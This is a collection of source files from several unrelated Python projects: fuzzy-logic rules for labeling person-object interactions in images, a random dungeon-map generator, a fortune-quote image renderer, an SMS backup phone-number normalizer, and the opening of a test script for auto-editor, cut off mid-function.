(self.__proximity['Close'] | self.__proximity['Medium'] |
self.__proximity['Far'] | self.__proximity['Very Far']),
self.__drinking_interaction['Not Drinking'])
self.__drinking_ctrl = ctrl.ControlSystem([self.__drinking_rule, self.__not_drinking_rule1,
self.__not_drinking_rule2])
self.__drinking_sim = ctrl.ControlSystemSimulation(self.__drinking_ctrl, flush_after_run=100)
def __create_eating_rules(self):
"""
These rules are for person eating food.
A person is only eating food if they overlap the food and are not below it
Starting with very strict rules. Overlap and very close entails eating. Everything else does not.
"""
        # IF overlap AND very close OR close THEN eating
self.__eating_rule = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Very Close'] | self.__proximity['Close']),
self.__eating_interaction['Eating'])
        # IF overlap AND medium OR far OR very far THEN not eating
self.__not_eating_rule1 = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Medium'] | self.__proximity['Far'] |
self.__proximity['Very Far']), self.__eating_interaction['Not Eating'])
# IF no overlap THEN not eating
self.__not_eating_rule2 = ctrl.Rule(self.__overlap['No Overlap'], self.__eating_interaction['Not Eating'])
self.__eating_ctrl = ctrl.ControlSystem([self.__eating_rule, self.__not_eating_rule1, self.__not_eating_rule2])
self.__eating_sim = ctrl.ControlSystemSimulation(self.__eating_ctrl, flush_after_run=100)
def compute_using_interaction(self, giou, iou, sr_angle):
self.__using_sim.input['proximity'] = giou
self.__using_sim.input['overlap'] = iou
self.__using_sim.compute()
using_result = self.__using_sim.output['using_interaction']
if self.__show_sim_result:
self.__using_interaction.view(sim=self.__using_sim)
using = fuzz.interp_membership(self.__using_interaction.universe, self.__using_interaction['Using'].mf,
using_result)
not_using = fuzz.interp_membership(self.__using_interaction.universe, self.__using_interaction['Not Using'].mf,
using_result)
membership = {'Using': using, 'Not Using': not_using}
ret_label = max(membership, key=membership.get)
if ret_label == 'Not Using':
return None
else:
return ret_label
def compute_drinking_interaction(self, giou, iou, sr_angle):
self.__drinking_sim.input['overlap'] = iou
self.__drinking_sim.input['proximity'] = giou
self.__drinking_sim.compute()
drinking_result = self.__drinking_sim.output['drinking_interaction']
if self.__show_sim_result:
self.__drinking_interaction.view(sim=self.__drinking_sim)
drinking = fuzz.interp_membership(self.__drinking_interaction.universe,
self.__drinking_interaction['Drinking'].mf, drinking_result)
not_drinking = fuzz.interp_membership(self.__drinking_interaction.universe,
self.__drinking_interaction['Not Drinking'].mf, drinking_result)
membership = {'Drinking': drinking, 'Not Drinking': not_drinking}
ret_label = max(membership, key=membership.get)
if ret_label == 'Not Drinking':
return None
else:
return ret_label
def compute_eating_interaction(self, giou, iou, sr_angle):
self.__eating_sim.input['proximity'] = giou
self.__eating_sim.input['overlap'] = iou
self.__eating_sim.compute()
eating_result = self.__eating_sim.output['eating_interaction']
if self.__show_sim_result:
self.__eating_interaction.view(sim=self.__eating_sim)
eating = fuzz.interp_membership(self.__eating_interaction.universe, self.__eating_interaction['Eating'].mf,
eating_result)
not_eating = fuzz.interp_membership(self.__eating_interaction.universe,
self.__eating_interaction['Not Eating'].mf, eating_result)
membership = {'Eating': eating, 'Not Eating': not_eating}
ret_label = max(membership, key=membership.get)
if ret_label == 'Not Eating':
return None
else:
return ret_label
def compute_interaction(self, label, dom_cat, sub_cat, giou, iou, sr_angle):
"""
Use the sub_cat to determine the appropriate simulation to call
"""
if sub_cat is not None and sub_cat == 'drink':
res_label = self.compute_drinking_interaction(giou, iou, sr_angle)
return res_label
if sub_cat is not None and sub_cat == 'eaten':
res_label = self.compute_eating_interaction(giou, iou, sr_angle)
return res_label
if sub_cat is not None and sub_cat == 'used':
res_label = self.compute_using_interaction(giou, iou, sr_angle)
return res_label
```
#### File: scene_labeling/level_two_utils/fuzzy_utils.py
```python
from skfuzzy import control as ctrl
import skfuzzy as fuzz
import numpy as np
def create_universes_membership_functions():
proximity = ctrl.Antecedent(universe=np.arange(-1.1, 1.1, 0.1), label='proximity')
overlap = ctrl.Antecedent(universe=np.arange(-1.1, 1.1, 0.1), label='overlap')
spatial_relationships = ctrl.Antecedent(universe=np.arange(-1, 361, 1), label='spatial_relationships')
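    # proximity is driven by GIoU (range -1 to 1), overlap by IoU, and
    # spatial_relationships by the histogram-of-forces angle in degrees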
proximity['Very Close'] = fuzz.trapmf(proximity.universe, [-0.1, 0.0, 0.3, 0.6])
proximity['Close'] = fuzz.trapmf(proximity.universe, [-0.35, -0.3, -0.05, 0.0])
proximity['Medium'] = fuzz.trapmf(proximity.universe, [-0.7, -0.5, -0.35, -0.25])
proximity['Far'] = fuzz.trapmf(proximity.universe, [-0.85, -0.75, -0.6, -0.5])
proximity['Very Far'] = fuzz.trapmf(proximity.universe, [-1.0, -0.95, -0.8, -0.75])
overlap['Overlap'] = fuzz.trapmf(overlap.universe, [0.0, 0.2, 0.7, 1.0])
overlap['No Overlap'] = fuzz.trapmf(overlap.universe, [-1.0, -0.7, -0.2, 0.0])
# 0 < HOF < 30 | 331 < HOF < 360: Right
spatial_relationships['Right1'] = fuzz.trimf(spatial_relationships.universe, [-1, 15, 31])
spatial_relationships['Right2'] = fuzz.trimf(spatial_relationships.universe, [330, 345, 360])
# 31 < HOF < 60: Above Right
spatial_relationships['Above Right'] = fuzz.trimf(spatial_relationships.universe, [30, 45, 61])
# 61 < HOF < 120: Above
spatial_relationships['Above'] = fuzz.trimf(spatial_relationships.universe, [60, 90, 121])
# 121 < HOF < 150: Above Left
spatial_relationships['Above Left'] = fuzz.trimf(spatial_relationships.universe, [120, 135, 151])
# 151 < HOF < 210: Left
spatial_relationships['Left'] = fuzz.trimf(spatial_relationships.universe, [150, 180, 211])
# 211 < HOF < 240: Below Left
spatial_relationships['Below Left'] = fuzz.trimf(spatial_relationships.universe, [210, 225, 241])
# 241 < HOF < 300: Below
spatial_relationships['Below'] = fuzz.trimf(spatial_relationships.universe, [240, 270, 301])
# 301 < HOF < 330: Below Right
spatial_relationships['Below Right'] = fuzz.trimf(spatial_relationships.universe, [300, 315, 331])
return proximity, overlap, spatial_relationships
```
#### File: scene_labeling/level_two_utils/general_rules.py
```python
from collections import defaultdict
from level_two_utils.fuzzy_utils import create_universes_membership_functions
import numpy as np
import skfuzzy as fuzz
from skfuzzy import control as ctrl
class GeneralRules:
def __init__(self):
self.__general_categories_lookup = defaultdict(list)
prox, over, spat = create_universes_membership_functions()
self.__proximity = prox
self.__overlap = over
self.__spatial_relationships = spat
self.__create_membership_functions()
self.__create_rules()
def __create_membership_functions(self):
"""
Construct the consequent membership function for the interaction fuzzy variable
:return:
"""
self.__interaction = ctrl.Consequent(universe=np.arange(-1.1, 1.1, 0.1), label='interaction')
self.__interaction['Interacting'] = fuzz.trimf(self.__interaction.universe, [0.0, 0.5, 1.0])
self.__interaction['Not Interacting'] = fuzz.trimf(self.__interaction.universe, [-1.0, -0.5, 0.0])
def __create_rules(self):
"""
Construct the rule base for the general categories
These rules simply indicate whether or not objects are interacting
:return:
"""
self.__interacting_rule_1 = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Very Close'] | self.__proximity['Close']),
self.__interaction['Interacting'])
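        # IF no overlap AND very close THEN not interacting (proximity alone, without overlap, is not treated as interaction)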
        self.__not_interacting_rule0 = ctrl.Rule(self.__overlap['No Overlap'] & self.__proximity['Very Close'],
                                                 self.__interaction['Not Interacting'])
self.__not_interacting_rule1 = ctrl.Rule(self.__overlap['No Overlap'] &
(self.__proximity['Close'] | self.__proximity['Medium'] |
self.__proximity['Far'] | self.__proximity['Very Far']),
self.__interaction['Not Interacting'])
self.__not_interacting_rule2 = ctrl.Rule(self.__overlap['Overlap'] &
(self.__proximity['Medium'] | self.__proximity['Far'] |
self.__proximity['Very Far']), self.__interaction['Not Interacting'])
        self.__interaction_ctrl = ctrl.ControlSystem([self.__interacting_rule_1, self.__not_interacting_rule0,
                                                      self.__not_interacting_rule1, self.__not_interacting_rule2])
self.__interaction_sim = ctrl.ControlSystemSimulation(self.__interaction_ctrl, flush_after_run=100)
def compute_interactions(self, giou_score=None, iou_score=None):
self.__interaction_sim.input['proximity'] = giou_score
self.__interaction_sim.input['overlap'] = iou_score
self.__interaction_sim.compute()
interaction = self.__interaction_sim.output['interaction']
interacting = fuzz.interp_membership(self.__interaction.universe, self.__interaction['Interacting'].mf,
interaction)
not_interacting = fuzz.interp_membership(self.__interaction.universe, self.__interaction['Not Interacting'].mf,
interaction)
membership = {'Interacting': interacting, 'Not Interacting': not_interacting}
interacting_label = max(membership, key=membership.get)
return interacting_label
```
#### File: scene_labeling/visualizations/visualize_hof.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from pathlib import Path
HIST_DIR = './hist_vis/'
PLOTTING_FILE = './hist_vis/person_1_tie_1_hists.csv'
IMG_OUTPUT_FILE = './hist_vis/tie_hof.png'
def main():
# filepath = Path(HIST_DIR).glob('**/*')
# hist_files = [x for x in filepath if x.is_file()]
# The membership function lines to plot
left_x = [120, 180, 240]
left_y = [0, 100, 0]
below_x = [210, 270, 330]
below_y = [0, 100, 0]
above_x = [30, 90, 150]
above_y = [0, 100, 0]
right1_x = [0, 30, 60]
right1_y = [0, 100, 0]
right2_x = [300, 330, 360]
right2_y = [0, 100, 0]
df = pd.read_csv(PLOTTING_FILE, encoding='utf-8', engine='python')
magnitude = list(df['hyb_magnitude'])
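    # one normalized histogram-of-forces magnitude per angle bin, 0..360 degrees inclusive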
fig, ax = plt.subplots(dpi=300)
ax.plot(left_x, left_y, color='red', label='left', alpha=0.5)
plt.fill_between(left_x, left_y, color='red', alpha=0.5)
ax.plot(below_x, below_y, color='green', label='below', alpha=0.5)
plt.fill_between(below_x, below_y, color='green', alpha=0.5)
ax.plot(above_x, above_y, color='blueviolet', label='above', alpha=0.5)
plt.fill_between(above_x, above_y, color='blueviolet', alpha=0.5)
ax.plot(right1_x, right1_y, color='darkorange', label='right', alpha=0.5)
plt.fill_between(right1_x, right1_y, color='darkorange', alpha=0.5)
ax.plot(right2_x, right2_y, color='darkorange', alpha=0.5)
plt.fill_between(right2_x, right2_y, color='darkorange', alpha=0.5)
ax.bar(np.arange(361), magnitude, color='blue')
ax.set_xticks(np.arange(0, 361, 45))
plt.legend(loc='upper right')
plt.xlabel('Degrees')
plt.ylabel('Normalized Magnitude')
plt.savefig(IMG_OUTPUT_FILE)
plt.show()
if __name__ == '__main__':
main()
```
#### File: scene_labeling/visualizations/visualize_level_one_summaries.py
```python
import pandas as pd
import cv2
import json
import numpy as np
import os
INPUT_IMAGES_DIR = '../input/coco_images/'
LEVEL_ONE_SUMMARIES_FILE = '../output/level_one_summaries.csv'
# Store the level one summary images of interest
OUTPUT_DIR = '../input/image_results/level_one/'
if not os.path.exists(OUTPUT_DIR):
os.makedirs(OUTPUT_DIR)
COLORS = [
[255, 0, 0],
[0, 255, 0],
[0, 0, 255],
[255, 255, 255]
]
def convert_box(json_box):
box = np.array(json.loads(json_box))
return [int(box[0]), int(box[1]), int(box[2]), int(box[3])]
def draw_img_results(img, boxes, labels):
clone = img.copy()
i_color = 0
for b, l in zip(boxes, labels):
color = COLORS[i_color]
i_color += 1
if i_color > 3:
i_color = 0
cv2.rectangle(clone, (b[0], b[1]), (b[2], b[3]), color, 2)
if b[0] - 10 < 0:
l_x = b[0] + 10
else:
l_x = b[0] + 20
if b[1] - 20 < 0:
l_y = b[1] + 20
else:
l_y = b[1] - 10
cv2.putText(clone, l, (l_x, l_y), cv2.FONT_HERSHEY_SIMPLEX, 0.75, color, 2)
return clone
def main():
l1_df = pd.read_csv(LEVEL_ONE_SUMMARIES_FILE, encoding='utf-8', engine='python')
img_paths = list(l1_df['relative_path'].unique())
for p in img_paths:
img_df = l1_df.loc[l1_df['relative_path'] == p]
img_path = INPUT_IMAGES_DIR + p
orig_img = cv2.imread(img_path, cv2.IMREAD_COLOR)
boxes = []
labels = []
l1_summaries = []
for idx, row in img_df.iterrows():
arg_label = row['arg_label']
            if arg_label not in labels:
labels.append(arg_label)
boxes.append(convert_box(row['arg_bounding_box']))
ref_label = row['ref_label']
            if ref_label not in labels:
labels.append(ref_label)
boxes.append(convert_box(row['ref_bounding_box']))
l1_summary = row['level_one_summary']
            if l1_summary not in l1_summaries:
l1_summaries.append(row['level_one_summary'])
result_img = draw_img_results(orig_img, boxes, labels)
for l in l1_summaries:
print(l)
print()
cv2.imshow('Level One Summaries', result_img)
in_key = cv2.waitKey(0)
# If 's' is pressed, store the image to the output directory
if in_key == ord('s'):
output_path = OUTPUT_DIR + p
cv2.imwrite(output_path, result_img)
if __name__ == '__main__':
main()
```
|
{
"source": "jedavis-rpg/dungeonmap",
"score": 3
}
|
#### File: jedavis-rpg/dungeonmap/level.py
```python
import random
from PIL import Image, ImageDraw, ImageColor
from adjpair import AdjPair
from border import Border
from loop import Loop
from room import Room
from unionfinder import UnionFinder
ANIMATE = True
class Level(object):
def __init__(self, width=25, height=25):
self.width = width
self.height = height
walls = {}
for x in range(0, width):
for y in range(0, height):
                if x != width-1:
                    walls[AdjPair((x,y),(x+1,y))] = Border.WALL
                if y != height - 1:
                    walls[AdjPair((x,y),(x,y+1))] = Border.WALL
self.walls = walls
self.uf = UnionFinder(width, height)
self.rooms = []
self.loops = []
self.frames = []
def add_room(self, r):
for ap in r.all_adjpairs():
self.walls[ap] = Border.EMPTY
self.uf.union(ap.t1, ap.t2)
self.rooms.append(r)
def gen_random_rooms(self, room_frac=0.5):
room_dim_dist = [2, 2, 3, 3, 3, 4, 4, 5]
total_room_area = 0
while total_room_area / (self.width * self.height) < room_frac:
rand_corner = (random.randint(0, self.width-2), random.randint(0, self.height-2))
rand_width = random.choice(room_dim_dist)
if rand_corner[0] + rand_width >= self.width:
rand_width = self.width - rand_corner[0]
rand_height = random.choice(room_dim_dist)
if rand_corner[1] + rand_height >= self.height:
rand_height = self.height - rand_corner[1]
cand = Room(rand_corner, rand_width, rand_height)
# no overlapping rooms, only roomify leaderless areas
rejected = False
for t in cand.all_tiles():
if self.uf.ranks[t] != 0 or self.uf.find(t) != t:
rejected = True
if not rejected:
self.add_room(cand)
total_room_area += rand_height * rand_width
self.append_frame()
def add_loop(self, l):
for ap in l.all_adjpairs():
# TODO sometimes place a secret door instead
# once I have tech for actually drawing secret doors
self.walls[ap] = Border.EMPTY
self.uf.union(ap.t1, ap.t2)
self.loops.append(l)
def gen_random_loops(self, num_loops = 7):
loop_dim_dist = [6, 6, 7, 7, 8, 9, 10]
for i in range(num_loops):
rand_corner = (random.randint(0, self.width-3), random.randint(0, self.height-3))
rand_width = random.choice(loop_dim_dist)
if rand_corner[0] + rand_width >= self.width:
rand_width = self.width - rand_corner[0]
rand_height = random.choice(loop_dim_dist)
if rand_corner[1] + rand_height >= self.height:
rand_height = self.height - rand_corner[1]
cand = Loop(rand_corner, rand_width, rand_height)
self.add_loop(cand)
self.append_frame()
def uf_maze(self):
walls_list = [k for (k,v) in self.walls.items() if v == Border.WALL]
random.shuffle(walls_list)
i = 0
for w in walls_list:
if not self.uf.check_connected(w.t1, w.t2):
self.walls[w] = Border.EMPTY
self.uf.union(w.t1, w.t2)
i+=1
if i % 10 == 0:
self.append_frame()
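
    # Note: uf_maze is essentially randomized Kruskal's algorithm: walls are
    # visited in shuffled order and removed only when their two tiles are not
    # yet connected, so the leftover corridors form a spanning structure over
    # the tiles not already joined by rooms and loops.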
def draw_border(self, draw, px_per_tile):
max_x = px_per_tile * self.width - 1
max_y = px_per_tile * self.height - 2
corners = [(0,1),(0,max_y),(max_x,max_y),(max_x,1),(0,1)]
draw.line(corners, ImageColor.getrgb("black"), 2)
def draw_frame(self, px_per_tile=20):
im = Image.new('RGB', (self.width * px_per_tile, self.height * px_per_tile), ImageColor.getrgb("white"))
draw = ImageDraw.Draw(im)
for coords, bord in self.walls.items():
wall_coords = coords.get_wall_coords(px_per_tile)
            color = (0, 128, 255) # dim light blue (255 is the max channel value)
width = 1
if bord == Border.WALL:
width = 3
color = ImageColor.getrgb("black")
draw.line(wall_coords, color, width)
self.draw_border(draw, px_per_tile)
return im
def append_frame(self):
if ANIMATE:
self.frames.append(self.draw_frame())
def draw(self, outpath, px_per_tile=20):
self.frames.append(self.draw_frame(px_per_tile))
if outpath.endswith(".gif"):
self.frames[0].save(outpath, save_all=True, append_images=self.frames[1:] + [self.frames[-1]]*40, duration=100, loop=0)
else:
self.frames[-1].save(outpath)
if __name__ == "__main__":
l = Level()
l.gen_random_rooms()
l.gen_random_loops()
l.uf_maze()
if ANIMATE:
l.draw("./test.gif")
else:
l.draw("./test.jpg")
```
#### File: jedavis-rpg/dungeonmap/unionfinder.py
```python
class UnionFinder(object):
def __init__(self, width, height):
self.leaders = {}
self.ranks = {}
for t in [(x,y) for x in range (width) for y in range(height)]:
self.leaders[t] = t
self.ranks[t] = 0
# Finds the leader of t's connected component and returns it
# Updates leader state of all intermediate tiles
def find(self, t):
if t not in self.leaders:
raise ValueError("Attempting to find leader for unknown tile %s" % (t,))
curr = t
to_update = set()
while self.leaders[curr] != curr:
to_update.add(curr)
curr = self.leaders[curr]
for u in to_update:
self.leaders[u] = curr
return curr
def check_connected(self, t1, t2):
l1 = self.find(t1)
l2 = self.find(t2)
return l1 == l2
# Perform union-by-rank
def union(self, t1, t2):
l1 = self.find(t1)
l2 = self.find(t2)
if l1 == l2:
return
r1 = self.ranks[l1]
r2 = self.ranks[l2]
if r1 > r2:
self.leaders[l2] = l1
elif r1 < r2:
self.leaders[l1] = l2
else:
self.leaders[l2] = l1
self.ranks[l1] += 1
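
# Minimal usage sketch (not part of the original module): exercises find/union
# on a 3x3 grid of tiles.
if __name__ == "__main__":
    uf = UnionFinder(3, 3)
    uf.union((0, 0), (0, 1))
    uf.union((0, 1), (1, 1))
    assert uf.check_connected((0, 0), (1, 1))
    assert not uf.check_connected((0, 0), (2, 2))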
```
|
{
"source": "jedav/mototron",
"score": 3
}
|
#### File: jedav/mototron/motofortune.py
```python
from PIL import Image, ImageDraw, ImageFont, ImageColor
import sys
import os
SCREENSIZE = (1600, 900)
def put_text_in_box(draw, text, topleft, botright):
# iteratively decrease font size until it fits
# text is already assumed to have newlines and formatting
fontsize = 68
height = botright[1] - topleft[1]
width = botright[0] - topleft[0]
txtcolor = ImageColor.getrgb("white")
while fontsize > 10:
font = ImageFont.truetype("/usr/share/fonts/truetype/msttcorefonts/times.ttf", size=fontsize)
assert font
(x,y) = draw.multiline_textsize(text, font=font)
if x > width or y > height:
fontsize -= 4
else:
# time to center
xslack = width - x
yslack = height - y
topcoord = (topleft[0]+int(xslack / 2), topleft[1] + int(yslack / 2))
draw.multiline_text(topcoord, text, txtcolor, font)
return
print("could not fit %s into given box" % text)
raise ValueError
def render(quote, idx, outdir):
img = Image.new("RGB", SCREENSIZE) # default to black background
draw = ImageDraw.Draw(img) # jesus who named these functions?
put_text_in_box(draw, "%s" % quote, (100, 100), (1500, 800))
img.save(os.path.join(outdir, "%d.jpg" % idx))
def main():
if len(sys.argv) < 3:
print("usage: %s path/to/quotes path/to/outdir" % sys.argv[0])
exit(1)
assert os.path.isfile(sys.argv[1])
assert os.path.isdir(sys.argv[2])
lines = open(sys.argv[1]).read().split("\n")
quote = ""
count = 0
for i in range(len(lines)):
if lines[i].rstrip() == "%":
try:
render(quote.rstrip(), count, sys.argv[2])
count += 1
except ValueError:
pass
quote = ""
else:
quote += lines[i]+"\n"
if __name__ == "__main__":
main()
```
|
{
"source": "jedav/normalize_mms",
"score": 4
}
|
#### File: jedav/normalize_mms/normalize_addresses.py
```python
import defusedxml.ElementTree as ET
import re
import sys
# regular expression for finding things that look like international phone numbers
# developed from a handful of examples rather than the RFCs, so... works generally, could miss edge cases
PHONE_RE = re.compile(r"^(?:00[ -]?|\+?)(\d{0,3}?)[ -]?\(?(\d{3})\)?[ -]?(\d{3})[ -]?(\d{4})$")
# names of groups extracted by regex, by position
RE_PARTS = ["country", "area", "first", "last"]
# XML XPATH expression for finding nodes that have "address" attributes
ADDR_XPATH = ".//*[@address]"
class AddrData(object):
def __init__(self, addrdict):
self.canon = addrdict["first"]+addrdict["last"]
self.area = addrdict["area"]
if not len(self.area):
self.area = None
self.country = addrdict["country"]
if not len(self.country):
self.country = None
def update(self, other):
assert self.canon == other.canon
if other.country is not None:
if self.country is None:
self.country = other.country
assert self.country == other.country
if other.area is not None:
if self.area is None:
self.area = other.area
assert self.area == other.area
def __str__(self):
out = ""
if self.country:
out += "+"+self.country
if self.area:
out += self.area
out += self.canon
return out
# functions for gathering addresses
def add_addr(addrmap, addr):
match = PHONE_RE.match(addr)
if match is None:
return
parts = dict(zip(RE_PARTS, match.groups()))
canon = parts["first"] + parts["last"]
if canon in addrmap:
new_addr = AddrData(parts)
addrmap[canon].update(new_addr)
else:
addrmap[canon] = AddrData(parts)
def gather_addrs(root):
# here we look for multiple versions of the same address, some of which might have more information than others
# to make sure that when we canonicalize addresses, we do so correctly
# (rather than assuming, eg, that all addresses with unspecified country codes are USA)
addrmap = {}
addrs = [e.get("address") for e in root.findall(ADDR_XPATH)]
for addr in addrs:
if '~' in addr:
parts = addr.split('~')
for part in parts:
add_addr(addrmap, part)
else:
add_addr(addrmap, addr)
return addrmap
# functions for outputting normalized addresses
def normalize_addr(addrmap, addr):
match = PHONE_RE.match(addr)
if match is None:
return addr
parts = dict(zip(RE_PARTS, match.groups()))
canon = parts["first"] + parts["last"]
assert canon in addrmap
return str(addrmap[canon])
def update_addrs(root, addrmap):
nodes = root.findall(ADDR_XPATH)
for node in nodes:
address = node.get("address")
if '~' in address:
addresses = address.split('~')
else:
addresses = [address]
addresses = [normalize_addr(addrmap, addr) for addr in addresses]
address = '~'.join(addresses)
node.set("address", address)
def parse_args():
if len(sys.argv) < 2:
print "USAGE: %s path/to/input/db.xml [path/to/output/db.xml]"%sys.argv[0]
sys.exit(-1)
inpath = sys.argv[1]
if len(sys.argv) >= 3:
outpath = sys.argv[2]
else:
inpath_parts = inpath.split('.')
inpath_suffix = inpath_parts[-1]
inpath_prefix = '.'.join(inpath_parts[:-1])
outpath = inpath_prefix+"-compressed."+inpath_suffix
return (inpath, outpath)
def main():
(inpath, outpath) = parse_args()
tree = ET.parse(inpath, forbid_dtd=True)
root = tree.getroot()
addrmap = gather_addrs(root)
update_addrs(root, addrmap)
tree.write(outpath)
if __name__ == "__main__":
main()
```
|
{
"source": "JeDaYoshi/lykos",
"score": 2
}
|
#### File: src/gamemodes/random.py
```python
import random
from collections import defaultdict
from src.gamemodes import game_mode, GameMode, InvalidModeException
from src.messages import messages
from src.events import EventListener
from src import channels, users
from src.cats import All, Wolf, Killer
@game_mode("random", minp=8, maxp=24, likelihood=0)
class RandomMode(GameMode):
"""Completely random and hidden roles."""
def __init__(self, arg=""):
self.ROLE_REVEAL = random.choice(("on", "off", "team"))
self.STATS_TYPE = "disabled" if self.ROLE_REVEAL == "off" else random.choice(("disabled", "team"))
super().__init__(arg)
for role in self.SECONDARY_ROLES:
self.SECONDARY_ROLES[role] = All
self.TOTEM_CHANCES = {
"death" : {"shaman": 8, "wolf shaman": 1},
"protection" : {"shaman": 6, "wolf shaman": 6},
"silence" : {"shaman": 4, "wolf shaman": 3},
"revealing" : {"shaman": 2, "wolf shaman": 5},
"desperation" : {"shaman": 4, "wolf shaman": 7},
"impatience" : {"shaman": 7, "wolf shaman": 2},
"pacifism" : {"shaman": 7, "wolf shaman": 2},
"influence" : {"shaman": 7, "wolf shaman": 2},
"narcolepsy" : {"shaman": 4, "wolf shaman": 3},
"exchange" : {"shaman": 1, "wolf shaman": 1},
"lycanthropy" : {"shaman": 1, "wolf shaman": 3},
"luck" : {"shaman": 6, "wolf shaman": 7},
"pestilence" : {"shaman": 3, "wolf shaman": 1},
"retribution" : {"shaman": 5, "wolf shaman": 6},
"misdirection" : {"shaman": 6, "wolf shaman": 4},
"deceit" : {"shaman": 3, "wolf shaman": 6},
}
self.ROLE_SETS["gunner/sharpshooter"] = {"gunner": 8, "sharpshooter": 4}
self.set_default_totem_chances()
self.EVENTS = {
"role_attribution": EventListener(self.role_attribution),
"chK_win": EventListener(self.lovers_chk_win)
}
def role_attribution(self, evt, var, chk_win_conditions, villagers):
lpl = len(villagers) - 1
addroles = evt.data["addroles"]
addroles[random.choice(list(Wolf & Killer))] += 1 # make sure there's at least one wolf role
roles = list(All - self.SECONDARY_ROLES.keys() - {"villager", "cultist", "amnesiac"})
while lpl:
addroles[random.choice(roles)] += 1
lpl -= 1
addroles["gunner/sharpshooter"] = random.randrange(int(len(villagers) ** 1.2 / 4))
addroles["assassin"] = random.randrange(max(int(len(villagers) ** 1.2 / 8), 1))
rolemap = defaultdict(set)
mainroles = {}
i = 0
for role, count in addroles.items():
if count > 0:
for j in range(count):
u = users.FakeUser.from_nick(str(i + j))
rolemap[role].add(u.nick)
if role not in self.SECONDARY_ROLES:
mainroles[u] = role
i += count
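        # Trial assignment complete: if it would already satisfy a win
        # condition, the recursive call below re-rolls the attribution so that
        # only playable role distributions survive.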
if chk_win_conditions(rolemap, mainroles, end_game=False):
return self.role_attribution(evt, var, chk_win_conditions, villagers)
evt.prevent_default = True
```
#### File: src/roles/insomniac.py
```python
from src.functions import get_players, get_all_players, get_all_roles
from src.decorators import event_listener
from src.messages import messages
from src.cats import Nocturnal
def _get_targets(var, pl, user):
index = var.ALL_PLAYERS.index(user)
num_players = len(var.ALL_PLAYERS)
# determine left player
i = index
while True:
i = (i - 1) % num_players
if var.ALL_PLAYERS[i] in pl or var.ALL_PLAYERS[i] is user:
target1 = var.ALL_PLAYERS[i]
break
# determine right player
i = index
while True:
i = (i + 1) % num_players
if var.ALL_PLAYERS[i] in pl or var.ALL_PLAYERS[i] is user:
target2 = var.ALL_PLAYERS[i]
break
return (target1, target2)
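
# Example (illustrative): with var.ALL_PLAYERS = [A, B, C, D] and only A and C
# still alive, _get_targets(var, pl, C) skips the dead seats, wraps around the
# player list, and returns (A, A).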
@event_listener("transition_night_end")
def on_transition_night_end(evt, var):
if var.NIGHT_COUNT == 1 or var.ALWAYS_PM_ROLE:
for insomniac in get_all_players(("insomniac",)):
insomniac.send(messages["insomniac_notify"])
@event_listener("transition_day_begin")
def on_transition_day_begin(evt, var):
pl = get_players()
for insomniac in get_all_players(("insomniac",)):
p1, p2 = _get_targets(var, pl, insomniac)
p1_roles = get_all_roles(p1)
p2_roles = get_all_roles(p2)
if p1_roles & Nocturnal or p2_roles & Nocturnal:
# one or both of the players next to the insomniac were awake last night
insomniac.send(messages["insomniac_awake"].format(p1, p2))
else:
# both players next to the insomniac were asleep all night
insomniac.send(messages["insomniac_asleep"].format(p1, p2))
@event_listener("get_role_metadata")
def on_get_role_metadata(evt, var, kind):
if kind == "role_categories":
evt.data["insomniac"] = {"Village", "Nocturnal"}
```
|
{
"source": "jedberg/serverless-framework-tools",
"score": 3
}
|
#### File: jedberg/serverless-framework-tools/stub-functions.py
```python
import ast
import os
import yaml
def stub_out(func, file):
"""This function creates the default function stubs"""
with open(file, "a") as myfile:
text = """def %s(event, context):
response = dict(statusCode=501, body="")
return response
""" % (func)
myfile.write(text)
# Read in the serverless.yml file and find all the functions and files that should exist
f = ""
with open("serverless.yml", 'r') as stream:
f = yaml.full_load(stream)
function_handlers = [f['functions'][x]['handler'] for x in f['functions']]
# Construct the file names we're looking for
filenames = []
for file in function_handlers:
filenames.append((file.split('.')[1], os.path.join(os.getcwd() + "/" +
file.split('.')[0] +
'.py')))
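# Example (illustrative): a handler string "functions/users.create" becomes the
# tuple ("create", "<cwd>/functions/users.py").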
# Make sure the files we need exist, and create them if they are missing
for tup in filenames:
os.makedirs(os.path.dirname(tup[1]), exist_ok=True)
if not os.path.exists(tup[1]):
print("Creating "+ os.path.relpath(tup[1], os.getcwd()))
with open(tup[1], 'w'): pass
# Make sure the functions exist in the files
for tup in filenames:
with open(tup[1]) as fd:
file_contents = fd.read()
module = ast.parse(file_contents)
function_definitions = [node for node in module.body if isinstance(node, ast.FunctionDef)]
if tup[0] in [f.name for f in function_definitions]:
print("Found " + tup[0] + " in " + os.path.relpath(tup[1], os.getcwd()))
else:
print("Did not find " + tup[0] + " in " + os.path.relpath(tup[1], os.getcwd()) + ", stubbing out")
stub_out(tup[0], tup[1])
print("Stubbed out " + tup[0] + " in " + os.path.relpath(tup[1], os.getcwd()))
# Check for extra files
files_should_exist = [tup[1] for tup in filenames]
files_that_exist = []
exclude_dirs = set([".serverless", "__pycache__", "lib"])
exclude_files = set(["serverless.yml", "requirements.txt", "package.json", "__init__.py"])
for root, dirs, files in os.walk(os.getcwd(), topdown=True):
dirs[:] = [d for d in dirs if d not in exclude_dirs]
files[:] = [f for f in files if f not in exclude_files]
for file in files:
files_that_exist.append((os.path.join(root, file)))
for x in [x for x in files_that_exist if x not in files_should_exist]:
print("File " + os.path.relpath(x, os.getcwd()) + " may be unnecessary")
```
|
{
"source": "jedbrooke/auto-editor",
"score": 3
}
|
#### File: auto_editor/subcommands/test.py
```python
"""
Test auto-editor and make sure everything is working.
"""
from __future__ import print_function
# Internal Libraries
import os
import sys
import shutil
import platform
import subprocess
# Included Libraries
from auto_editor.utils.func import clean_list
from auto_editor.utils.log import Log
import auto_editor.vanparse as vanparse
from auto_editor import version as auto_editor_version
def test_options(parser):
parser.add_argument('--ffprobe_location', default='ffprobe',
        help='point to your custom ffprobe file.')
parser.add_argument('--only', '-n', nargs='*')
parser.add_argument('--help', '-h', action='store_true',
help='print info about the program or an option and exit.')
return parser
class FFprobe():
def __init__(self, path):
self.path = path
def run(self, cmd):
cmd.insert(0, self.path)
process = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, __ = process.communicate()
return stdout.decode('utf-8')
def pipe(self, cmd):
full_cmd = [self.path, '-v', 'error'] + cmd
process = subprocess.Popen(full_cmd, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
